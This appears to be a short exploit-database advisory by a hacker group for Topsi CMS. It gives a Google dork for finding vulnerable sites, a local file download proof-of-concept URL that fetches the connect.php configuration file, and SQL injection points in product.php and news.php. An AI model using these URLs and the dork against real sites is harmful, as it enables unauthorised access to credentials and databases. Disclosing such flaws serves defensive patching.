###################### # Exploit Title : Topsi CMS - Multiple Vulnerabilities # Exploit Author : Persian Hack Team # Vendor Homepage : http://www.topsi.net.cn/web.php # Google Dork LFD : inurl:downs.php?filename= # Category: [ Webapps ] # Tested on: [ Win ] # Version: Plan A TO E # Date: 2016/08/28 ###################### # # Topsi CMS suffer from LFD(Local File Download) And SQL Injection vulnerability # PoC: # --Local File Download # # http://www.site.com/downs.php?filename=/connect.php # # --SQL Injection # # GET Method # product.php?tid=[SQL] # news.php?tid=[SQL] # # http://www.site.com/product.php?tid=[SQL] # Youtube Demo : https://www.youtube.com/watch?v=zGm1QV8bfJE ###################### # Discovered by : Mojtaba MobhaM Mail:kazemimojtaba@live.com # B3li3v3 M3 I will n3v3r St0p # Greetz : T3NZOG4N & FireKernel & Dr.Askarzade & Masood Ostad & Dr.Koorangi & Milad Hacking & JOK3R $ Mr_Mask_Black And All Persian Hack Team Members # Homepage : persian-team.ir ######################